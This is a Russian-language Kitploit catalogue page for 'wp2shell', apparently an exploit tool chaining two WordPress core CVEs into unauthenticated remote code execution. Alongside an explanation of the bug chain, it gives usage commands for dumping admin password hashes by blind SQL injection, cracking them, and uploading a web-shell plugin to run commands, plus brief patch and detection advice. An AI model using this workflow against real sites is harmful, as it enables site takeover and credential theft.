Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wp2shell-Wordpress-TOWN — Неаутентифицированное удалённое выполнение кода (RCE) в ядре WordPress позволяет злоумышленникам выполнять произвольный код без входа в систему, связывая CVE-2026-63030 и CVE-2026-60137, что потенциально может привести к полной компрометации сайта. | Kitploit
Инструменты/GitHubGitHub/lucifer0xf/wp2shell-wordpress-town
Сканеры уязвимостейАнализ КодаЭксплуатацияВеб-безопасностьCTFОбучение и Образование
GitHublucifer0xf/wp2shell-wordpress-town

wp2shell-Wordpress-TOWN

Неаутентифицированное удалённое выполнение кода (RCE) в ядре WordPress позволяет злоумышленникам выполнять произвольный код без входа в систему, связывая CVE-2026-63030 и CVE-2026-60137, что потенциально может привести к полной компрометации сайта.

Репозиторий
21101 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

wp2shell от: lucifer0xf

Banner

Неаутентифицированное удалённое выполнение кода для WordPress Core POC (CVE-2026-63030 + CVE-2026-60137)

wp2shell — эксплойт для критической цепочки уязвимостей в ядре WordPress. Он объединяет ошибку путаницы маршрутов пакетных запросов REST API с SQL-инъекцией в WP_Query для достижения неаутентифицированного удалённого выполнения кода на уязвимых установках WordPress.

ДетальИнформация
CVECVE-2026-63030 (путаница маршрутов пакетных запросов REST) + CVE-2026-60137 (SQLi через author__not_in)
ЗатронутыWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Исправлено6.9.5, 7.0.2
Требуется аутентификацияНет — неаутентифицированно
CVSSКритический (цепочка RCE)
ОбнаружилAdam Kues (Assetnote / Searchlight Cyber)
ЗависимостиPython 3.8+ — только стандартная библиотека

Как это работает

Эксплойт объединяет две ошибки в ядре WordPress:

  1. CVE-2026-60137 — SQL-инъекция – Когда author__not_in передаётся в виде строки вместо массива, WordPress пропускает защитную проверку is_array() и подставляет сырое значение в SQL-выражение NOT IN (...).

  2. CVE-2026-63030 — Путаница маршрутов пакетных запросов – Конечная точка /wp-json/batch/v1 строит параллельные массивы $matches и $validation. Некорректный подзапрос добавляется в $validation, но не в $matches, что вызывает смещение индекса на +1. Подзапрос i обрабатывается обработчиком подзапроса i+1.

В совокупности: запрос POST /wp/v2/posts, несущий внутренний запрос GET /wp/v2/users со строкой author_exclude, обходит как список разрешённых методов, так и санитизацию ввода. Строка попадает в WP_Query как author__not_in и интерполируется в SQL — что даёт вам неаутентифицированную слепую SQL-инъекцию.

После этого инструмент может:

  • Извлечь хеш пароля администратора
  • Аутентифицироваться как администратор (после взлома хеша)
  • Загрузить вредоносный плагин
  • Выполнять произвольные системные команды

Возможности

ВозможностьОписание
Проверка уязвимостиБезопасный зонд с временной задержкой — не читает данные, ничего не изменяет
Извлечение данныхСлепая SQL-инъекция с оптимизацией бинарным поиском для эффективного извлечения
Дамп хешей пользователейИзвлечение user_login и хешей user_pass из wp_users
Удалённое выполнение кодаАутентификация как администратор, загрузка плагина-веб-шелла, выполнение команд
Интерактивная оболочкаСеанс постоянного выполнения команд
Цветной выводНаглядная визуальная обратная связь по результатам сканирования
Без зависимостейИспользуется только стандартная библиотека Python

Установка

root@kitploit:~
git clone https://github.com/lucifer0xf/wp2shell-Wordpress-TOWN.git
cd wp2shell-Wordpress-TOWN
chmod +x wp2shell.py

Вот и всё. Сторонние пакеты не требуются.


Использование

root@kitploit:~
./wp2shell.py <url> [command] [options]

Интерактивный режим (на основе меню)

root@kitploit:~
./wp2shell.py http://target.com

Запускает интерактивное меню со всеми функциями, доступными через пронумерованные опции.

Команды

check — Подтверждение уязвимости (безопасно)

Выполняет зонд с временной задержкой для подтверждения эксплуатируемости. Не читает данные и ничего не изменяет.

root@kitploit:~
./wp2shell.py http://target.com check

read — Извлечение данных (слепая SQL-инъекция)

Извлекает информацию из базы данных с помощью времязависимой слепой SQL-инъекции.

root@kitploit:~
# Отпечаток сервера (версия, база данных, пользователь)
./wp2shell.py http://target.com read

# Извлечение логинов пользователей и хешей паролей
./wp2shell.py http://target.com read --users

# Извлечение имени базы данных
./wp2shell.py http://target.com read --database

# Извлечение версии MySQL
./wp2shell.py http://target.com read --version

# Произвольный SQL-запрос
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Удалённое выполнение кода

Требуются действительные учётные данные администратора. SQL-инъекция может восстановить хеш пароля, но вы должны указать восстановленный пароль в открытом виде.

root@kitploit:~
# Выполнение одной команды
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Выполнение одной команды (краткая форма)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Опции

ОпцияОписание
--usersИзвлечь user_login и user_pass из wp_users
--databaseИзвлечь имя текущей базы данных
--versionИзвлечь версию MySQL
--query "SQL"Выполнить произвольный SQL-запрос (слепое извлечение)
--user USERИмя пользователя администратора для RCE
--password PASSПароль администратора для RCE (в открытом виде, восстановлен через SQLi)
--cmd CMDКоманда для выполнения через веб-шелл

Пример рабочего процесса

root@kitploit:~
# 1. Проверка, уязвима ли цель
./wp2shell.py https://example.com check

# 2. Извлечение хешей паролей администратора
./wp2shell.py https://example.com read --users

# 3. Взлом хеша офлайн (с помощью hashcat, john и т. д.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Выполнение команды с восстановленным паролем
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Затронутые версии

ВеткаЗатронутыИсправлено
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (только SQLi, без RCE)6.8.6

Версии до 6.9.0 не затронуты полной цепочкой RCE.


Обнаружение и смягчение последствий

Для защитников:

  • Немедленно обновитесь до 6.9.5, 7.0.2 или новее
  • Пользователи Cloudflare WAF защищены автоматически
  • У клиентов Wordfence есть правила межсетевого экрана
  • Отслеживайте запросы POST /wp-json/batch/v1 с вложенными телами requests
  • Ошибка 404 на маршруте batch не всегда означает «исправлено» — она также может означать, что WAF/CDN блокирует анонимный доступ к REST API

Правовое предупреждение

Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.


Благодарности

  • Обнаружение: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (Путаница маршрутов batch): Adam Kues
Скачать инструмент